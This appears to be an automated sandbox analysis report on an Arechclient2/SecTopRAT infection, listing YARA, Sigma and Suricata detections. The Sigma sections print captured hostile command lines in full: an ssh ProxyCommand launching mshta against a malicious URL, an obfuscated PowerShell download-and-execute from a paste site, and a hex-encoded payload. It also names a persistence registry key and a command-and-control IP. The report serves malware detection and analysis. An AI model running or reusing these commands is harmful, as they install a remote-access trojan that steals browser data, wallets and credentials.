33.2.AutoIt3.exe.4bf6e70.1.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
Click to see the 18 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7720.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xd256:$b1: ::WriteAllBytes( 0x10ba:$s1: -join 0xc9c9:$s1: -join 0xd30b:$s1: -join 0x6175:$s4: += 0x6237:$s4: += 0xa45e:$s4: += 0xc57b:$s4: += 0xc865:$s4: += 0xc9ab:$s4: += 0xf2c6:$s4: += 0xf346:$s4: += 0xf40c:$s4: += 0xf48c:$s4: += 0xf662:$s4: += 0xf6e6:$s4: += 0xcd34:$e4: Start-Process 0xd791:$e4: Get-WmiObject 0xd980:$e4: Get-Process 0xd9d8:$e4: Start-Process

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7348, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4, ProcessId: 7444, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE97

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\27589682\updater.exe, ProcessId: 2024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ggkfcbc

Sigma detected: Lolbin Ssh.exe Use As Proxy

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" ., ProcessId: 6760, ProcessName: ssh.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE97

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\27589682\updater.exe" C:\Users\user~1\AppData\Local\Temp\27589682\OWoDjWrI.dll , CommandLine: "C:\Users\user~1\AppData\Local\Temp\27589682\updater.exe" C:\Users\user~1\AppData\Local\Temp\27589682\OWoDjWrI.dll , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\27589682\updater.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\27589682\updater.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\27589682\updater.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7844, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\27589682\updater.exe" C:\Users\user~1\AppData\Local\Temp\27589682\OWoDjWrI.dll , ProcessId: 2024, ProcessName: updater.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57), CommandLine: powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 6760, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57), ProcessId: 7192, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7648, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:10:46.865284+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.7	49810	TCP
2024-12-17T08:12:00.471695+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.7	50048	TCP
2024-12-17T08:12:04.503623+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.7	50063	TCP

ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:10:45.734348+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:45.854458+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:45.975908+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.095883+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.215806+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.335679+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.455468+0100	2051910	1	A Network Trojan was detected	192.168.2.7	49810	185.147.124.236	15647	TCP
